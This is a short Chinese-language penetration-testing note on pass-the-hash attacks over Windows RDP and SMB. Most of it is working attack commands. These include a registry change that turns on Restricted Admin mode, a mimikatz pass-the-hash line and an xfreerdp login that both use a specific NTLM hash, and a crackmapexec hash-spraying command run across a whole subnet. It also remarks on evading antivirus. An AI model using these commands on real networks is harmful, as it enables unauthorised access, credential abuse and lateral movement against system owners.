./Administrator c6de864a0d3ba9437e6a1e0789d4a844
微软也提供PSTOOLS包工具,但不支持使用hash传递。以下使用的为impacket-examples-windows工具,它支持利用hash传递。因为第三方,所以需要解决绕过杀软问题。
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f //开启Restricted Admin mode
1,利用mimikatz进行rdp登录。
这里还有一个问题,客户端需要支持Restricted Admin mode。如果当前系统不支持Restricted Admin mode,执行mstsc.exe /restrictedadmin后弹出远程桌面的参数说明
sekurlsa::pth /user:administrator /domain:192.168.100.164 /ntlm:c6de864a0d3ba9437e6a1e0789d4a844 "/run:mstsc.exe /restrictedadmin"
2,利用xfreerdp进行rdp登录,kali自带该工具
xfreerdp /v:192.168.100.164 /u:administrator /pth:c6de864a0d3ba9437e6a1e0789d4a844 /cert:ignore
pth批量爆破
利用crackmapexec进行密码喷洒,喷洒本地administrator
crackmapexec smb 192.168.100.0/24 -u administrator -H NTLM-HASH.txt(收集到的hash字典) -x whoami -d workgroup
其他
这里尝试了利用普通账号,加入管理员组的账号,普通域账号,加入域管组的域账号进行pth攻击
本地普通用户
加入管理员组的本地账号
域普通账号
加入域管理员组的账号